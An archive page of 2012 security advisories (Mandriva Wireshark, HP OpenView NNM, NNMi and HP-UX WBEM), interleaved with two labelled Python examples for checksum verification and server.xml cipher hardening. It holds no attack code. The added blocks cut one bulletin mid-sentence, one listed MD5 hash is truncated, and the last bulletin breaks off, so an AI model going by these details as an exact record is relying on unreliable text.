[ MDVSA-2012:042 ] wireshark

2012-03-28 Thread security
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2012:042
 http://www.mandriva.com/security/
 ___

 Package : wireshark
 Date: March 28, 2012
 Affected: 2011.
 ___

 Problem Description:

 Multiple vulnerabilities were found and corrected in Wireshark:
 
 * The ANSI A dissector could dereference a NULL pointer and crash.
 * The IEEE 802.11 dissector could go into an infinite loop.
 * The pcap and pcap-ng file parsers could crash trying to read
 ERF data.
 * The MP2T dissector could try to allocate too much memory and crash.
 
 This advisory provides the latest version of Wireshark (1.6.6) which
 is not vulnerable to these issues.
 ___

 References:

 http://www.wireshark.org/security/wnpa-sec-2012-04.html
 http://www.wireshark.org/security/wnpa-sec-2012-05.html
 http://www.wireshark.org/security/wnpa-sec-2012-06.html
 http://www.wireshark.org/security/wnpa-sec-2012-07.html
 ___

 Updated Packages:

 Mandriva Linux 2011:
 ea021ca036ceb38f1530e5387df5dcc5  2011/i586/dumpcap-1.6.6-0.1-mdv2011.0.i586.rpm
 9cfa609402a364a43128893c75ac3e65  2011/i586/libwireshark1-1.6.6-0.1-mdv2011.0.i586.rpm
 c1247647ebcb69eaced064db72fec93d  2011/i586/libwireshark-devel-1.6.6-0.1-mdv2011.0.i586.rpm
 c3cd964180dc7a64083c6d1b94ff4f46  2011/i586/rawshark-1.6.6-0.1-mdv2011.0.i586.rpm
 387e8977955d381243f66709e80cc586  2011/i586/tshark-1.6.6-0.1-mdv2011.0.i586.rpm
 03bcfb73c00cd43d34f9edeceea2f571  2011/i586/wireshark-1.6.6-0.1-mdv2011.0.i586.rpm
 2bd6ffb92d2b8251fad0b7b22c93f37e  2011/i586/wireshark-tools-1.6.6-0.1-mdv2011.0.i586.rpm
 ab444f989bf59113ff0e900a7087dbd5  2011/SRPMS/wireshark-1.6.6-0.1.src.rpm

 Mandriva Linux 2011/X86_64:
 e474457135acb1652912a4f1b0afab19  2011/x86_64/dumpcap-1.6.6-0.1-mdv2011.0.x86_64.rpm
 630b3f5e05d4361181f0af5502c3a35e  2011/x86_64/lib64wireshark1-1.6.6-0.1-mdv2011.0.x86_64.rpm
 e6c12c75778ee83283abf9bec3beb435  2011/x86_64/lib64wireshark-devel-1.6.6-0.1-mdv2011.0.x86_64.rpm
 f67c069153d5a1959343b072b936ea5c  2011/x86_64/rawshark-1.6.6-0.1-mdv2011.0.x86_64.rpm
 878a5fa2fed2df8f58f5242c9745  2011/x86_64/tshark-1.6.6-0.1-mdv2011.0.x86_64.rpm
 406544bfb3241f6f02e52761e0b30fd1  2011/x86_64/wireshark-1.6.6-0.1-mdv2011.0.x86_64.rpm
 32eb71abbd26ca7a68a2a9b8a66b9fd8  2011/x86_64/wireshark-tools-1.6.6-0.1-mdv2011.0.x86_64.rpm
 ab444f989bf59113ff0e900a7087dbd5  2011/SRPMS/wireshark-1.6.6-0.1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFPcurMmqjQ0CJFipgRAiERAKC8XoWF9RE0GBQEsnn79s5/dlyUAQCfT1yC
O9926o+K6ALAdK3jC2VqnBw=
=qAaT
-----END PGP SIGNATURE-----
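The advisory above lists an MD5 checksum for every updated package and says urpmi verifies checksums and GPG signatures for you. For packages fetched by hand, the following is an added example (not part of the Mandriva advisory or of urpmi) that parses such an "Updated Packages" listing, including entries that the archive wrapped onto two lines, and checks downloaded files against it. The package bytes and hashes in `demo()` are constructed for the demo; `verify_from_disk` is the function you would point at a real download directory.

```python
"""Verify downloaded update packages against the checksum list in an advisory.

Added example; it is not part of the Mandriva advisory or of urpmi. It parses
an "Updated Packages" listing like the one in MDVSA-2012:042, including entries
that the mailing-list archive wrapped onto two lines, hashes the package bytes
with MD5 and reports which files match. MD5 only catches corruption or a
swapped file; the GPG signature that urpmi checks is the actual trust anchor.
"""
import hashlib
import re
from pathlib import Path
from typing import Callable, Dict, List, Optional, Tuple

HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")


def parse_checksum_list(text: str) -> Dict[str, str]:
    """Return {package_path: md5_hex} from advisory text.

    Accepts "hash  path" on one line as well as a bare hash followed by its
    path on the next line (the wrapped form seen in archived copies).
    """
    entries: Dict[str, str] = {}
    pending_hash: Optional[str] = None
    for raw in text.splitlines():
        tokens = raw.split()
        if not tokens:
            continue
        if pending_hash is not None:
            # The previous line held a bare hash; this line carries its path.
            if len(tokens) == 1:
                entries[tokens[0]] = pending_hash.lower()
            pending_hash = None
            continue
        if len(tokens) == 2 and HEX32.match(tokens[0]):
            entries[tokens[1]] = tokens[0].lower()
        elif len(tokens) == 1 and HEX32.match(tokens[0]):
            pending_hash = tokens[0]
        # Anything else (section headers, separators, malformed hashes) is skipped.
    return entries


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def verify_packages(entries: Dict[str, str],
                    read_bytes: Callable[[str], bytes]) -> Tuple[List[str], List[str]]:
    """Split the listed packages into (matching, failing).

    read_bytes(path) returns the file content; a missing file (OSError from
    disk, KeyError from an in-memory store) counts as failing.
    """
    ok: List[str] = []
    bad: List[str] = []
    for path, expected in entries.items():
        try:
            data = read_bytes(path)
        except (OSError, KeyError):
            bad.append(path)
            continue
        (ok if md5_hex(data) == expected else bad).append(path)
    return ok, bad


def verify_from_disk(listing: str, base_dir: str) -> Tuple[List[str], List[str]]:
    """Verify packages downloaded under base_dir against the advisory listing."""
    return verify_packages(parse_checksum_list(listing),
                           lambda p: (Path(base_dir) / p).read_bytes())


def demo() -> Tuple[List[str], List[str]]:
    """Constructed sample: two in-memory 'packages', one altered after the
    checksum was published. The hashes are computed here, not taken from the
    advisory, because the real package bytes are not available offline."""
    dumpcap = b"constructed dumpcap package bytes"
    tshark_published = b"constructed tshark package bytes as published"
    listing = (
        f" {md5_hex(dumpcap)}  \n"                       # wrapped entry: hash alone
        "2011/i586/dumpcap-1.6.6-0.1-mdv2011.0.i586.rpm\n"
        f" {md5_hex(tshark_published)}  2011/i586/tshark-1.6.6-0.1-mdv2011.0.i586.rpm\n"
    )
    files = {
        "2011/i586/dumpcap-1.6.6-0.1-mdv2011.0.i586.rpm": dumpcap,
        "2011/i586/tshark-1.6.6-0.1-mdv2011.0.i586.rpm": b"tampered tshark bytes",
    }
    return verify_packages(parse_checksum_list(listing), lambda p: files[p])


if __name__ == "__main__":
    matched, failed = demo()
    print("OK:", matched)
    print("FAILED:", failed)
```

Run `verify_from_disk(advisory_text, "/path/to/downloads")` with the advisory body as `advisory_text`; any path in the second list should be re-downloaded, and the signature check (`rpm -K`, or urpmi's automatic check) remains the step that actually establishes the package came from Mandriva.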



[security bulletin] HPSBMU02747 SSRT100771 rev.1 - HP OpenView Network Node Manager (OV NNM) Running Apache Tomcat, Remote Denial of Service (DoS)

2012-03-28 Thread security-alert
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03231290
Version: 1

HPSBMU02747 SSRT100771 rev.1 - HP OpenView Network Node Manager (OV NNM) 
Running Apache Tomcat, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2012-03-27
Last Updated: 2012-03-27

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP OpenView 
Network Node Manager (OV NNM) running Apache Tomcat. The vulnerabilities could 
be exploited remotely to create a Denial of Service (DoS).

References: CVE-2012-0022, CVE-2011-4858

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Network Node Manager (OV NNM) v7.53 running on HP-UX, Linux, and 
Solaris.

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference      Base Vector                   Base Score
  CVE-2012-0022  (AV:N/AC:L/Au:N/C:N/I:N/A:P)  5.0
  CVE-2011-4858  (AV:N/AC:L/Au:N/C:N/I:N/A:P)  5.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided a hotfix to resolve the vulnerability. The SSRT100771 hotfix is 
available by contacting the normal HP Services support channel.

MANUAL ACTIONS: Yes - NonUpdate

Install the hotfix for SSRT100771.

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins 
issued by HP and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS (for HP-UX)

For HP-UX OV NNM 7.53
HP-UX B.11.31
HP-UX B.11.23 (IA)
HP-UX B.11.23 (PA)
HP-UX B.11.11
=
OVNNMgr.OVNNM-RUN,fr=B.07.50.00
action: install the hotfix for SSRT100771

END AFFECTED VERSIONS (for HP-UX)

HISTORY
Version:1 (rev.1) - 27 March 2012 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal HP Services support channel.  For other issues about 
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin 
alerts via Email: 
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated periodically, 
is contained in HP Security Notice HPSN-2011-001: 
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is 
available here: 
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the 
title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors 
or omissions contained herein. The information provided is provided as is 
without warranty of any kind. To the extent permitted by law, neither HP or its 
affiliates, subcontractors or suppliers will be liable for incidental, special 
or consequential damages including downtime cost; lost profits; damages relating 
to the procurement of substitute products or services; or damages for loss of 
data, or software restoration. The information in this document is subject to 
change without notice. Hewlett-Packard Company and the names of Hewlett-Packard 
products referenced herein are trademarks of Hewlett-Packard Company in the 
United States and other countries. Other product and company names mentioned 
herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAk9xzvoACgkQ4B86/C0qfVkxnwCfdMnKaD1xMTP0Y/kvlgBOExuL
iPAAnAkQrExylafaMMM6BD+/uRFoAFfS
=CxxM
-----END PGP SIGNATURE-----


[security bulletin] HPSBMU02748 SSRT100772 rev.1 - HP OpenView Network Node Manager (OV NNM) Running Apache HTTP Server, Remote Unauthorized Disclosure of Information, Unauthorized Modification, Denia

2012-03-28 Thread security-alert
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03231301
Version: 1

HPSBMU02748 SSRT100772 rev.1 - HP OpenView Network Node Manager (OV NNM) 
Running Apache HTTP Server, Remote Unauthorized Disclosure of Information, 
Unauthorized Modification, Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2012-03-27
Last Updated: 2012-03-27

Potential Security Impact: Remote unauthorized disclosure of information, 
unauthorized modification, Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP OpenView 
Network Node Manager (OV NNM) running Apache HTTP Server. The vulnerabilities 
could be exploited remotely resulting in unauthorized disclosure of 
information, unauthorized modification, or Denial of Service (DoS).

References: CVE-2012-0053, CVE-2012-0031, CVE-2012-0021, CVE-2011-4317, 
CVE-2011-3607, CVE-2011-3368

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Network Node Manager (OV NNM) v7.53 running on HP-UX, Linux, and 
Solaris.

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference      Base Vector                   Base Score
  CVE-2012-0053  (AV:N/AC:M/Au:N/C:P/I:N/A:N)  4.3
  CVE-2012-0031  (AV:L/AC:L/Au:N/C:P/I:P/A:P)  4.6
  CVE-2012-0021  (AV:N/AC:H/Au:N/C:N/I:N/A:P)  2.6
  CVE-2011-4317  (AV:N/AC:M/Au:N/C:N/I:P/A:N)  4.3
  CVE-2011-3607  (AV:L/AC:M/Au:N/C:P/I:P/A:P)  4.4
  CVE-2011-3368  (AV:N/AC:L/Au:N/C:P/I:N/A:N)  5.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided a hotfix to resolve the vulnerabilities. The SSRT100772 hotfix 
is available by contacting the normal HP Services support channel.

MANUAL ACTIONS: Yes - NonUpdate

Install the hotfix for SSRT100772.

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins 
issued by HP and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS (for HP-UX)

For HP-UX OV NNM 7.53
HP-UX B.11.31
HP-UX B.11.23 (IA)
HP-UX B.11.23 (PA)
HP-UX B.11.11
=
OVNNMgr.OVNNM-RUN,fr=B.07.50.00
action: install the hotfix for SSRT100772

END AFFECTED VERSIONS (for HP-UX)

HISTORY
Version:1 (rev.1) - 27 March 2012 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal HP Services support channel.  For other issues about 
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin 
alerts via Email: 
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated periodically, 
is contained in HP Security Notice HPSN-2011-001: 
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is 
available here: 
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the 
title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors 
or omissions contained herein. The information provided is provided as is 
without warranty of any kind. To the extent permitted by law, neither HP or its 
affiliates, subcontractors or suppliers will be liable for incidental, special 
or consequential damages including downtime cost; lost profits; damages relating 
to the procurement of substitute products or services; or damages for loss of 
data, or software restoration. The information in this document is subject to 
change without notice. 

[security bulletin] HPSBMU02744 SSRT100776 rev.2 - HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Disclosure of Information

2012-03-28 Thread security-alert
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03223954
Version: 2

HPSBMU02744 SSRT100776 rev.2 - HP Network Node Manager i (NNMi) for HP-UX, 
Linux, Solaris, and Windows, Remote Unauthorized Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2012-03-07
Last Updated: 2012-03-27

Potential Security Impact: Remote unauthorized disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Network Node 
Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows. The vulnerability 
could be remotely exploited resulting in unauthorized disclosure of information.

References: CVE-2007-1858

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Network Node Manager i (NNMi) v8.x, v9.0x, v9.1x for HP-UX, Linux, Solaris, 
and Windows

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference      Base Vector                   Base Score
  CVE-2007-1858  (AV:N/AC:H/Au:N/C:P/I:N/A:N)  2.6
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made the following procedure available to resolve the vulnerability.

Backup the appropriate file to another directory.

%NnmInstallDir%\nonOV\jboss\nms\server\nms\deploy\jboss-web.deployer\server.xml 
[Windows]

$NnmInstallDir/nonOV/jboss/nms/server/nms/deploy/jboss-web.deployer/server.xml 
[HP-UX, Linux, Solaris]

Edit the original server.xml file.

Add the following to the end of the SSL Connector entry. The entry must be one 
continuous string with no line breaks.

ciphers=TLS_DHE_RSA_WITH_AES_128_CBC_SHA,TLS_DHE_DSS_WITH_AES_128_CBC_SHA,TLS_RSA_WITH_AES_128_CBC_SHA,SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA,SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA,SSL_RSA_WITH_3DES_EDE_CBC_SHA

For example, in NNMi v9.10 the entry would be:

<Connector port="${jboss.https.port}" ... ciphers="..."/>

Save and verify

Save the file.

Stop and restart NNMi.

Bring up the UI to verify that NNMi is still functioning correctly.

MANUAL ACTIONS: Yes - NonUpdate

Edit the server.xml file as described above.

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins 
issued by HP and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see: https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS (for HP-UX)

HP-UX B.11.31
HP-UX B.11.23 (IA)
=
HPOvNNM.HPNMSJBOSS
action: edit the server.xml file as described in the Resolution

END AFFECTED VERSIONS (for HP-UX)

HISTORY
Version:1 (rev.1) - 7 March 2012 Initial release
Version:2 (rev.2) - 27 March 2012 Corrected Windows path

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal HP Services support channel.  For other issues about 
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin 
alerts via Email: 
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated periodically, 
is contained in HP Security Notice HPSN-2011-001: 
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is 
available here: 
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the 
title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors 
or omissions contained herein. The information provided is provided as is 
without warranty of any kind. To the extent permitted by law, neither HP or its 
affiliates, subcontractors or suppliers will be liable for 
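The resolution above is a hand edit of server.xml: append a `ciphers` attribute, as one string with no line breaks, to the SSL Connector, then save, restart and verify. The following is an added example, not HP's tooling, that performs and then verifies that edit with Python's standard XML library. `SAMPLE_SERVER_XML` is constructed for the demo and is not the real NNMi file; the attribute names it relies on (`SSLEnabled`, `scheme`, `port`) are the standard Tomcat Connector attributes, and the cipher string is the bulletin's list joined exactly as the bulletin requires.

```python
"""Apply the server.xml cipher restriction from HPSBMU02744 with a script.

Added example; it is not HP's tooling. It finds the SSL Connector element in a
JBoss/Tomcat server.xml, sets its ciphers attribute to the suite list the
bulletin gives as one continuous string, and leaves the other Connectors
untouched. SAMPLE_SERVER_XML is constructed for the demo and is not the real
NNMi file; the attribute names it uses (SSLEnabled, scheme, port) are the
standard Tomcat Connector attributes.
"""
import xml.etree.ElementTree as ET
from typing import Dict, Optional

# The six suites listed in the bulletin, joined exactly as it requires: one
# string, no line breaks.
NNMI_CIPHERS = ",".join([
    "TLS_DHE_RSA_WITH_AES_128_CBC_SHA",
    "TLS_DHE_DSS_WITH_AES_128_CBC_SHA",
    "TLS_RSA_WITH_AES_128_CBC_SHA",
    "SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA",
    "SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA",
    "SSL_RSA_WITH_3DES_EDE_CBC_SHA",
])


def _parse(xml_text: str) -> ET.Element:
    # insert_comments=True (Python 3.8+) keeps XML comments so the rewritten
    # file stays reviewable; the XML declaration is still dropped by tostring.
    parser = ET.XMLParser(target=ET.TreeBuilder(insert_comments=True))
    return ET.fromstring(xml_text, parser=parser)


def _is_ssl_connector(el: ET.Element) -> bool:
    return (el.get("SSLEnabled", "").lower() == "true"
            or el.get("scheme", "").lower() == "https")


def restrict_ssl_ciphers(xml_text: str, ciphers: str = NNMI_CIPHERS) -> str:
    """Return server.xml text with ciphers=... set on every SSL Connector."""
    if any(ch.isspace() for ch in ciphers):
        raise ValueError("cipher list must be one continuous string with no whitespace")
    root = _parse(xml_text)
    targets = [el for el in root.iter("Connector") if _is_ssl_connector(el)]
    if not targets:
        raise ValueError("no SSL Connector found; nothing to change")
    for el in targets:
        el.set("ciphers", ciphers)
    return ET.tostring(root, encoding="unicode")


def connector_ciphers(xml_text: str) -> Dict[Optional[str], Optional[str]]:
    """Map each Connector's port attribute to its ciphers attribute (None if
    unset), for checking the edit before restarting NNMi."""
    root = _parse(xml_text)
    return {el.get("port"): el.get("ciphers") for el in root.iter("Connector")}


SAMPLE_SERVER_XML = """<Server>
  <!-- constructed sample, not the NNMi server.xml -->
  <Service name="jboss.web">
    <Connector port="${jboss.http.port}" protocol="HTTP/1.1"/>
    <Connector port="${jboss.https.port}" protocol="HTTP/1.1" SSLEnabled="true"
               scheme="https" secure="true" clientAuth="false" sslProtocol="TLS"/>
  </Service>
</Server>
"""


if __name__ == "__main__":
    hardened = restrict_ssl_ciphers(SAMPLE_SERVER_XML)
    print(hardened)
    print(connector_ciphers(hardened))
```

Because ElementTree rewrites the whole document (it drops the XML declaration and normalises attribute quoting), keep the backup the bulletin asks for and diff the result against it before restarting; `connector_ciphers` on the saved file is the quick check that only the `${jboss.https.port}` Connector changed.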

[security bulletin] HPSBUX02755 SSRT100667 rev.1 - HP-UX WBEM, Remote Unauthorized Access to Diagnostic Data

2012-03-28 Thread security-alert
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03221589
Version: 1

HPSBUX02755 SSRT100667 rev.1 - HP-UX WBEM, Remote Unauthorized Access to 
Diagnostic Data

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2012-03-27
Last Updated: 2012-03-27

Potential Security Impact: Unauthorized access to diagnostic data

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with certain HP-UX WBEM 
components. The vulnerability could be exploited remotely in HP-UX 11.11 and 
HP-UX 11.23 to gain unauthorized access to diagnostic data. The vulnerability 
could be exploited locally in HP-UX 11.31 to gain unauthorized access to 
diagnostic data.

References: CVE-2012-0125 (HP-UX 11.31), CVE-2012-0126 (HP-UX 11.11 and HP-UX 
11.23)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  HP-UX release  Component         Affected versions
  HP-UX 11.31    ProviderSvcsBase  before C.07.00.08.02
  HP-UX 11.31    SysFaultMgmt      before C.07.06.03.01
  HP-UX 11.31    DASProvider       before B.11.31.1203.07.02
  HP-UX 11.31    FCProvider        before B.11.31.1203.06.02
  HP-UX 11.31    RAIDSAProvider    before B.11.31.1203.06.02
  HP-UX 11.31    SASProvider       before B.11.31.1203.05.02
  HP-UX 11.23    SysFaultMgmt      before B.07.06.01.02
  HP-UX 11.11    SysFaultMgmt      before A.04.04.03.02

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference      Base Vector                   Base Score
  CVE-2012-0125  (AV:L/AC:M/Au:S/C:P/I:P/A:N)  3.0
  CVE-2012-0126  (AV:N/AC:M/Au:N/C:P/I:P/A:N)  5.8
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

Note: The root cause of the vulnerability is the same for HP-UX 11.11, 11.23, 
and 11.31. However, the vulnerable feature cannot be accessed remotely in HP-UX 
11.31.

RESOLUTION

HP has provided the following to resolve the vulnerability.

HP-UX 11i v3 (HP-UX 11.31)

WBEMMgmtBundle C.03.01 or subsequent is available for download here:

https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=WBEMMgmtBundle

HP-UX 11i v2 (HP-UX 11.23)

SysFaultMgmt B.07.06.01.02 or subsequent is available for download here:

https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=SysFaultMgmt

HP-UX 11i v1 (HP-UX 11.11)

SysFaultMgmt A.04.04.03.02 or subsequent is available for download here:

https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=SysFaultMgmt

MANUAL ACTIONS: Yes - Update

Install the update as listed above.

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins 
issued by HP and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see: https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS (for HP-UX)

HP-UX B.11.31
==
SFM-CORE.SFM_PRO_PA
SFM-CORE.SFM_PRO_IA
SFM-CORE.CPU-TEST-IA
SFM-CORE.CTR_PRO_COMM
SFM-CORE.CTR_PRO_COREIA
SFM-CORE.CTR_PRO_COREPA
SFM-CORE.EMT_COREIA
SFM-CORE.EMT_COREPA
SFM-CORE.EMT_DOC
SFM-CORE.EVM_PRO_COMM
SFM-CORE.EVM_PRO_COREIA
SFM-CORE.EVM_PRO_COREPA
SFM-CORE.EVWEB_COMM
SFM-CORE.EVWEB_COREIA
SFM-CORE.EVWEB_COREPA
SFM-CORE.EVWEB_DOC
SFM-CORE.EVWEB_GUI_COMM
SFM-CORE.EVWEB_GUI_IA
SFM-CORE.EVWEB_GUI_PA
SFM-CORE.FMD_PRO_COMM
SFM-CORE.FMD_PRO_COREIA
SFM-CORE.FMD_PRO_COREPA
action: install revision C.07.06.03 or subsequent

HP-UX B.11.31
==
SFM-JOEM-CORE.SFM_PRO_JOEM
SFM-JOEM-CORE.CTR_PRO_JOEM
SFM-JOEM-CORE.EMT_CORE_JOEM
SFM-JOEM-CORE.EMT_DOC_JOEM
SFM-JOEM-CORE.EMT_MAN_JOEM
SFM-JOEM-CORE.EVM_PRO_JOEM
SFM-JOEM-CORE.EVWEB_COR_JOEM
SFM-JOEM-CORE.EVWEB_DOC_JOEM
SFM-JOEM-CORE.EVWEB_GUI_JOEM
SFM-JOEM-CORE.EVWEB_MAN_JOEM
SFM-JOEM-CORE.FMD_PRO_JOEM
SFM-JOEM-CORE.GS_JOEM
SFM-JOEM-CORE.MISC_CORE_JOEM
SFM-JOEM-CORE.SFM_JOEM_MAN
SFM-JOEM-CORE.SFM_PRO_JOEM
SFM-JOEM-CORE.SFM_PRO_JOEM
action: install revision C.07.06.03 or subsequent

HP-UX B.11.31
==
RAIDSA-PROVIDER.RAIDSA-PROV-RUN
action: install revision B.11.31.1203.06.02 or subsequent

HP-UX B.11.31
==
WBEMP-Storage.STORAGE-IP-LIB
WBEMP-Storage.STORAGE-IP-RUN
WBEMP-Storage.STORAGE-LWE-RUN
WBEMP-Storage.STORAGE-PROV-LIB
WBEMP-Storage.STORAGE-PROV-RUN
action: install revision B.11.31.1203.07.02 or subsequent

HP-UX B.11.31

WBEMP-FCP.CSP-LIB
WBEMP-FCP.CSP-LIB
WBEMP-FCP.CSP-RUN
WBEMP-FCP.FCP-IP-LIB
WBEMP-FCP.FCP-IP-LIB
WBEMP-FCP.FCP-IP-RUN
WBEMP-FCP.FCP-IP-RUN
WBEMP-FCP.FCP-LIB
WBEMP-FCP.FCP-LIB
WBEMP-FCP.FCP-NIP-LIB
WBEMP-FCP.FCP-NIP-RUN
